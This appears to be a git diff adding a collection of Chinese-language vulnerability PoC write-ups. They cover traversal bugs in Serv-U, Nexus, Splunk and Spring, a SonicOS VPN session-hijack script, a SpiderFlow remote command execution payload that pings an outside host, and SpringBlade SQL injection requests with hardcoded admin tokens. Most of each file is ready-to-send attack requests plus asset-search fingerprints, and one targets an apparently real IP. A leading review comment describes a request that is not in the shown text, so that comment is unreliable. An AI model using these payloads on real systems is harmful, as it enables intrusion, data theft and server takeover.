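Review bot: the body `className=UserService&methodName=loginFromDB¶ms=["system","0a"]` has `¶ms` in place of `&params`, and `Content-Length: 81` only matches a URL-encoded form of `&params=["system","0a"]` (the literal is 67 bytes); commit the exact bytes sent. `Origin` and `Referer` point at `https://smartbi.cy-sys.cn`, a real third-party host, while `Host` is `xx.xx.xx.xx`; use the placeholder throughout. In step 2 the image link and the text run together on one line, and step 3 is split across lines by the export.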
@@ -0,0 +1,46 @@ +# SolarWinds Serv-U存在目录遍历漏洞(CVE-2024-28995) + +# 一、漏洞简介 +SolarWinds的产品主要面向中小型企业和大型企业的IT部门,提供网络监控、系统管理、数据库管理、安全管理等解决方案,2024年6月,Serv-U 官方 SolarWinds 发布了新补丁,修复了一处目录 遍历Q 致文件读取漏洞(CVE-2024-28995)。Serv-U 的目录遍历漏洞(CVE-2024-28995)是由于在处理路径时缺乏适当的验证。攻击者可以通过传递包含"../"的路径段绕过路径验证,访问任意文件。 + +# 二、影响版本 +SolarWinds Serv-U FTP Server <= 15.4.2 Hotfix 1 + +SolarWinds Serv-U Gateway <= 15.4.2 Hotfix 1 + +SolarWinds Serv-U MFT Server <= 15.4.2 Hotfix 1 + +# 三、资产测绘 +```plain +server="Serv-U" +``` + +![1718816792242-9264a1a9-21a1-46b7-883c-05bdc2ebd941.png](./img/rz4V_zywIK0VMDWz/1718816792242-9264a1a9-21a1-46b7-883c-05bdc2ebd941-121329.png) + +# 四、漏洞复现 +```java +GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept: */* +Connection: keep-alive +``` + +![1718816940899-dad0cdd4-ca21-4852-a979-1ccb1047686a.png](./img/rz4V_zywIK0VMDWz/1718816940899-dad0cdd4-ca21-4852-a979-1ccb1047686a-277040.png) + +```java +GET /?InternalDir=\..\..\..\..\etc&InternalFile=passwd HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept: */* +Connection: keep-alive +``` + +![1718817173765-53cef411-e387-4a5c-bac9-2b22ffc05443.png](./img/rz4V_zywIK0VMDWz/1718817173765-53cef411-e387-4a5c-bac9-2b22ffc05443-721181.png) + + + +> 更新: 2024-06-23 23:42:48 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vt3h2cvl0d3cb5do> \ No newline at end of file diff --git a/SonatypeNexusRepository3存在目录遍历漏洞.md b/SonatypeNexusRepository3存在目录遍历漏洞.md new file mode 100644 index 0000000..37fec10 --- /dev/null +++ b/SonatypeNexusRepository3存在目录遍历漏洞.md 
@@ -0,0 +1,31 @@ +# Sonatype Nexus Repository 3存在目录遍历漏洞 + +# 一、漏洞简介 + Sonatype Nexus Repository 3是一个universal repository manager,用于管理和代理各种软件组件、工件和依赖项。它支持多种格式,包括Java、npm、PyPI、Docker、 Helm 等。 Sonatype Nexus Repository 3 目录遍历漏洞,恶意攻击者可能利用该漏洞读取服务器上的敏感文件。 + +# 二、影响版本 ++ Sonatype Nexus Repository + +# 三、资产测绘 ++ fofa`app="Nexus-Repository-Manager"` ++ 特征 + +![1716536322398-f581723f-9518-4a47-ba84-7b1d911984ac.png](./img/On-MgBR8a1x-iDHA/1716536322398-f581723f-9518-4a47-ba84-7b1d911984ac-061105.png) + +# 四、漏洞复现 +```plain +GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 +Host: 162.19.64.171:8081 +Accept: */* +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Connection: close +Cache-Control: max-age=0 +``` + +![1716536350863-7c1e10d0-08ba-4671-b9a6-739d4a32afbf.png](./img/On-MgBR8a1x-iDHA/1716536350863-7c1e10d0-08ba-4671-b9a6-739d4a32afbf-686669.png) + + + +> 更新: 2024-06-01 11:14:22 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rx4pgbpa10t7pmtr> \ No newline at end of file diff --git a/SonicOS-SSLVPN身份验证绕过漏洞(CVE-2024-53704).md b/SonicOS-SSLVPN身份验证绕过漏洞(CVE-2024-53704).md new file mode 100644 index 0000000..e20e05a --- /dev/null +++ b/SonicOS-SSLVPN身份验证绕过漏洞(CVE-2024-53704).md 
@@ -0,0 +1,23 @@ +# SonicOS-SSLVPN身份验证绕过漏洞(CVE-2024-53704) + +**SonicWall防火墙的身份验证旁路,允许远程攻击者劫持Active SSL SSL VPN会话并获得未经授权的网络访问,Sononicos版本7.1.x(7.1.1-7058及以上),7.1.2-7019和8.0.0-8035受到影响**。 + +## poc + +```python +import base64, requests, urllib3, warnings +warnings.filterwarnings("ignore", category=urllib3.exceptions.InsecureRequestWarning) +resp = requests.get( + "https://192.168.50.189:4433/cgi-bin/sslvpnclient?launchplatform=", + cookies={"swap": base64.b64encode(b"\x00" * 32).decode()}, + verify=False +) +print(resp.headers) +print(resp.body) +``` + + + +## 漏洞来源 + +- https://bishopfox.com/blog/sonicwall-cve-2024-53704-ssl-vpn-session-hijacking \ No newline at end of file diff --git a/SpiderFlow爬虫平台存在远程命令执行漏洞(CVE-2024-0195).md b/SpiderFlow爬虫平台存在远程命令执行漏洞(CVE-2024-0195).md new file mode 100644 index 0000000..2fa964d --- /dev/null +++ b/SpiderFlow爬虫平台存在远程命令执行漏洞(CVE-2024-0195).md @@ -0,0 +1,31 @@ +# SpiderFlow爬虫平台存在远程命令执行漏洞(CVE-2024-0195) + +# 一、漏洞简介 +SpiderFlow是新一代开源爬虫平台,以图形化方式定义爬虫流程,不写代码即可完成爬虫。基于springboot+layui开发的前后端不分离,也可以进行二次开发。该系统/function/save接口存在RCE漏洞,攻击者可以构造恶意命令远控服务器。 + +# 二、影响版本 ++ SpiderFlow爬虫平台 v0.5.0 + +# 三、资产测绘 ++ fofa`app="spiderflow"` ++ 特征 + +![1725588617253-d0956560-866d-4745-b3bf-b6c473dd9551.png](./img/OjWEtwl7z1fS0Qxs/1725588617253-d0956560-866d-4745-b3bf-b6c473dd9551-660786.png) + +# 四、漏洞复现 +```java +POST /function/save HTTP/1.1 +Host: +X-Requested-With: XMLHttpRequest +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Content-Length: 142 + +id=&name=test¶meter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+nccrflrlvu.yutu.eu.org')%3B%7B +``` + +![1725588674894-0c5cdc42-26f7-472d-9bd8-afb2199f8abf.png](./img/OjWEtwl7z1fS0Qxs/1725588674894-0c5cdc42-26f7-472d-9bd8-afb2199f8abf-550132.png) + + + +> 更新: 2024-10-22 09:36:10 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/obeii8pkzzb4154z> \ No newline at end of file 
diff --git a/SplunkEnterprise任意文件读取漏洞(CVE-2024-36991).md b/SplunkEnterprise任意文件读取漏洞(CVE-2024-36991).md new file mode 100644 index 0000000..d8629c9 --- /dev/null +++ b/SplunkEnterprise任意文件读取漏洞(CVE-2024-36991).md @@ -0,0 +1,47 @@ +# Splunk Enterprise任意文件读取漏洞(CVE-2024-36991) + +# 一、漏洞简介 +Splunk是美国Splunk公司的一套数据收集分析软件。该软件主要用于收集、索引和分析及其所产生的数据,包括所有IT系统和基础结构(物理、虚拟机和云)生成的数据。Splunk存在安全漏洞。攻击者利用该漏洞可以访问存储在web根文件夹之外的文件和目录。 + +# 二、影响版本 ++ 9.2<=Splunk Enterprise<9.2.2 ++ 9.1<=Splunk Enterprise<9.1.5 ++ 9.0<=Splunk Enterprise<9.0.10 + +# 三、资产测绘 ++ fofa`app="splunk-Enterprise"` ++ 特征 + +![1720273720505-3af79a8c-bd30-41f5-b5fb-44ae246c02f3.png](./img/MgsperMvGBWWALbV/1720273720505-3af79a8c-bd30-41f5-b5fb-44ae246c02f3-225104.png) + +# 四、漏洞复现 +```http +GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini HTTP/1.1 +Host: +Accept-Encoding:gzip,deflate,br +Accept:*/* +Accept-Language:en-US;q=0.9,en;q=0.8 +User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/124.0.6367.118Safari/537.36 +Connection:close +Cache-Control:max-age=0 +``` + +![1720273759529-a759e825-7b31-4472-9ef7-19625d1b6ab5.png](./img/MgsperMvGBWWALbV/1720273759529-a759e825-7b31-4472-9ef7-19625d1b6ab5-430061.png) + +```http +GET /zh-CN/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini HTTP/1.1 +Host: +Accept-Encoding:gzip,deflate,br +Accept:*/* +Accept-Language:en-US;q=0.9,en;q=0.8 +User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/124.0.6367.118Safari/537.36 +Connection:close +Cache-Control:max-age=0 +``` + +![1720273792757-5a47a5df-5caf-4007-a33b-0248ab13a19d.png](./img/MgsperMvGBWWALbV/1720273792757-5a47a5df-5caf-4007-a33b-0248ab13a19d-711831.png) + + + +> 更新: 2024-09-05 23:24:41 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ovx0hur1ngmfy7f9> \ No newline at end of file 
diff --git a/Spring-Framework路径遍历漏洞(CVE-2024-38816).md b/Spring-Framework路径遍历漏洞(CVE-2024-38816).md new file mode 100644 index 0000000..0476afd --- /dev/null +++ b/Spring-Framework路径遍历漏洞(CVE-2024-38816).md @@ -0,0 +1,27 @@ +# Spring-Framework路径遍历漏洞(CVE-2024-38816) + +Spring Framework受影响版本中,使用WebMvc.fn 或 WebFlux.fn(在Spring Web MVC或Spring WebFlux框架中)提供静态资源的应用程序容易受到路径遍历攻击,当Web 应用程序使用RouterFunctions提供静态资源并且应用程序使用FileSystemResource或类似的配置来从文件系统提供静态文件时,威胁者可构造恶意HTTP请求访问目标文件系统上Spring 应用程序进程有权访问的任意文件,从而导致数据泄露。 + +## 影响范围 + +Spring Framework 5.3.0 - 5.3.39 + +Spring Framework 6.0.0 - 6.0.23 + +Spring Framework 6.1.0 - 6.1.12 + +## 漏洞环境 + +https://github.com/weliveby/cve-2024-38816-demo + +## poc + +```javascript +GET /static/%5c/%5c/../../v.txt HTTP/1.1 +Host: 127.0.0.1:8087 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +``` + +![image-20240929095330475](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409290953532.png) + +![image-20240929095436847](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409290954898.png) \ No newline at end of file diff --git a/SpringBlade-blade-log存在SQL-注入漏洞.md b/SpringBlade-blade-log存在SQL-注入漏洞.md new file mode 100644 index 0000000..73adfdf --- /dev/null +++ b/SpringBlade-blade-log存在SQL-注入漏洞.md 
@@ -0,0 +1,15 @@ +## SpringBlade blade-log存在SQL 注入漏洞 + + +## poc +``` +GET /api/blade-log/error/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1 HTTP/1.1 +Host: +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0 +Accept: application/json, text/plain, */* +Blade-Auth: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.UHWWVEc6oi6Z6_AC5_WcRrKS9fB3aYH7XZxL9_xH-yIoUNeBrFoylXjGEwRY3Dv7GJeFnl5ppu8eOS3YYFqdeQ +``` +![image](https://github.com/wy876/POC/assets/139549762/59820cee-7b55-4e58-9b65-7b4f5a4bc12d) + diff --git a/SpringBlade-export-user-SQL-注入漏洞.md b/SpringBlade-export-user-SQL-注入漏洞.md new file mode 100644 index 0000000..5fe928e --- /dev/null +++ b/SpringBlade-export-user-SQL-注入漏洞.md 
@@ -0,0 +1,16 @@ +## SpringBlade export-user SQL 注入漏洞 + +SpringBlade 是一个由商业级项目升级优化而来的SpringCloud分布式微服务架构、SpringBoot单体式微服务架构并存的综合型项目,采用Java8 API重构了业务代码,完全遵循阿里巴巴编码规范。采用Spring Boot 2.7 、Spring Cloud 2021 、Mybatis 等核心技术,同时提供基于React和Vue的两个前端框架用于快速搭建企业级的SaaS多租户微服务平台。在github上有6.3K Star。该系统/api/blade-user/export-user接口存在SQL注入漏洞,会造成数据泄露。 + +## fofa +``` +body="https://bladex.vip" +``` + +## poc +``` +http://192.168.40.130.90/api/blade-user/export-user?Blade-Auth=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.UHWWVEc6oi6Z6_AC5_WcRrKS9fB3aYH7XZxL9_xH-yIoUNeBrFoylXjGEwRY3Dv7GJeFnl5ppu8eOS3YYFqdeQ&account&realName&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1 + +``` +![8606bf72e1e31edb69ca633e2b0a9ecd](https://github.com/wy876/POC/assets/139549762/a0d23d76-6588-4dfd-ad0e-b81aef36c062) + diff --git a/SpringBladeapi-list存在SQL注入漏洞.md b/SpringBladeapi-list存在SQL注入漏洞.md new file mode 100644 index 0000000..b4ba4a4 --- /dev/null +++ b/SpringBladeapi-list存在SQL注入漏洞.md 
@@ -0,0 +1,31 @@ +# SpringBlade api-list存在SQL注入漏洞 + +# 一、漏洞简介 +SpringBlade api-list存在SQL注入漏洞,攻击者利用该漏洞进行SQL注 入攻击 + +# 二、影响版本 ++ SpringBlade + +# 三、资产测绘 ++ `<font style="color:rgb(63, 63, 63);">body="https://bladex.vip"</font>` + +![1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71.png](./img/wySOnzT0xKrb1lCv/1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71-230326.png) + +# 四、漏洞复现 +```java +GET /api/blade-log/api/list?updatexml(1,concat(0x7e,111*111,0x7e),1)=1 HTTP/1.1 +Host: +Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +``` + +![1716303401430-b9efceb6-bca4-420d-81f8-f8ecd3220f3c.png](./img/wySOnzT0xKrb1lCv/1716303401430-b9efceb6-bca4-420d-81f8-f8ecd3220f3c-181020.png) + +```java +12321 +``` + + + +> 更新: 2024-12-13 17:10:57 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bxhqc6lec9obt7lg> \ No newline at end of file diff --git a/SpringBladeblade-user-list存在SQL注入漏洞.md b/SpringBladeblade-user-list存在SQL注入漏洞.md new file mode 100644 index 0000000..b54cb64 --- /dev/null +++ b/SpringBladeblade-user-list存在SQL注入漏洞.md 
@@ -0,0 +1,28 @@ +# SpringBlade blade-user-list存在SQL注入漏洞 + +# 一、漏洞简介 +SpringBlade blade-user-list存在SQL注入漏洞,攻击者利用该漏洞进行SQL注入攻击 + +# 二、影响版本 ++ SpringBlade + +# 三、资产测绘 ++ `<font style="color:rgb(63, 63, 63);">body="https://bladex.vip"</font>` + +![1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71.png](./img/8MClMtc2cjguyKwm/1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71-142126.png) + +# 四、漏洞复现 +```java +GET /api/blade-user/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1 HTTP/1.1 +Host: +User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ +Connection: close +``` + +![1722875134506-fcf1c67f-b543-432a-a29e-c201fe69a5c7.png](./img/8MClMtc2cjguyKwm/1722875134506-fcf1c67f-b543-432a-a29e-c201fe69a5c7-686300.png) + + + +> 更新: 2024-12-13 17:10:56 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kxqvvhhxlie10nii> \ No newline at end of file diff --git a/SpringBladecode-list存在SQL注入漏洞.md b/SpringBladecode-list存在SQL注入漏洞.md new file mode 100644 index 0000000..13115b7 --- /dev/null +++ b/SpringBladecode-list存在SQL注入漏洞.md 
@@ -0,0 +1,28 @@ +# SpringBlade code-list存在SQL注入漏洞 + +# 一、漏洞简介 +SpringBlade code-list存在SQL注入漏洞,攻击者利用该漏洞进行SQL注入攻击 + +# 二、影响版本 ++ SpringBlade + +# 三、资产测绘 ++ `<font style="color:rgb(63, 63, 63);">body="https://bladex.vip"</font>` + +![1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71.png](./img/kV2dyz_loYZ3KDlR/1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71-643561.png) + +# 四、漏洞复现 +```java +GET /api/blade-develop/code/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1 HTTP/1.1 +Host: +User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ +Connection: close +``` + +![1722875023704-551a90ac-0d8c-4c2f-b964-32442906adf0.png](./img/kV2dyz_loYZ3KDlR/1722875023704-551a90ac-0d8c-4c2f-b964-32442906adf0-601991.png) + + + +> 更新: 2024-12-13 17:10:56 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rai84tybgfc4flks> \ No newline at end of file diff --git a/SpringBladedatasource-list存在敏感信息泄露.md b/SpringBladedatasource-list存在敏感信息泄露.md new file mode 100644 index 0000000..a97d123 --- /dev/null +++ b/SpringBladedatasource-list存在敏感信息泄露.md 
@@ -0,0 +1,28 @@ +# SpringBlade datasource-list存在敏感信息泄露 + +# 一、漏洞简介 +SpringBlade datasource-list存在敏感信息泄露漏洞 + +# 二、影响版本 ++ SpringBlade + +# 三、资产测绘 ++ `<font style="color:rgb(63, 63, 63);">body="https://bladex.vip"</font>` + +![1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71.png](./img/AjeJd3ytEL9HrhNQ/1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71-859792.png) + +# 四、漏洞复现 +```java +GET /api/blade-develop/datasource/list HTTP/1.1 +Host: +User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ +Connection: close +``` + +![1722874818816-5a6dee23-66b6-4249-ab50-92a2f14977c4.png](./img/AjeJd3ytEL9HrhNQ/1722874818816-5a6dee23-66b6-4249-ab50-92a2f14977c4-850077.png) + + + +> 更新: 2024-12-13 17:10:56 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fyrvvqbbnir53nqg> \ No newline at end of file diff --git a/SpringBladedict-biz-list存在SQL注入漏洞.md b/SpringBladedict-biz-list存在SQL注入漏洞.md new file mode 100644 index 0000000..145d4b0 --- /dev/null +++ b/SpringBladedict-biz-list存在SQL注入漏洞.md 
@@ -0,0 +1,28 @@ +# SpringBlade dict-biz-list存在SQL注入漏洞 + +# 一、漏洞简介 +SpringBlade dict-biz-list存在SQL注入漏洞,攻击者利用该漏洞进行SQL注入攻击 + +# 二、影响版本 ++ SpringBlade + +# 三、资产测绘 ++ `<font style="color:rgb(63, 63, 63);">body="https://bladex.vip"</font>` + +![1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71.png](./img/zP2uHUDH9siaTuRD/1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71-391449.png) + +# 四、漏洞复现 +```java +GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1 HTTP/1.1 +Host: +User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ +Connection: close +``` + +![1722874895220-4024b228-5758-48fa-816a-9afa12566780.png](./img/zP2uHUDH9siaTuRD/1722874895220-4024b228-5758-48fa-816a-9afa12566780-645241.png) + + + +> 更新: 2024-12-13 17:10:56 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/saek9akpfy591lcv> \ No newline at end of file diff --git a/SpringBladedict-biz存在SQL注入漏洞.md b/SpringBladedict-biz存在SQL注入漏洞.md new file mode 100644 index 0000000..76c328c --- /dev/null +++ b/SpringBladedict-biz存在SQL注入漏洞.md 
@@ -0,0 +1,39 @@ +# SpringBlade dict-biz存在SQL注入漏洞 + +# 一、漏洞简介 +SpringBlade dict-biz存在SQL注入漏洞,攻击者利用该漏洞进行SQL注 入攻击 + +# 二、影响版本 ++ SpringBlade + +# 三、资产测绘 ++ `<font style="color:rgb(63, 63, 63);">body="https://bladex.vip"</font>` + +![1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71.png](./img/eKNle2a8FR_4cOKY/1703260241729-c77ed022-a493-4621-983c-5ec64ddbde71-322685.png) + +# 四、漏洞复现 +```java +GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,md5(1),user(),0x7e),1)=1 HTTP/1.1 +Host: +Blade-Auth: 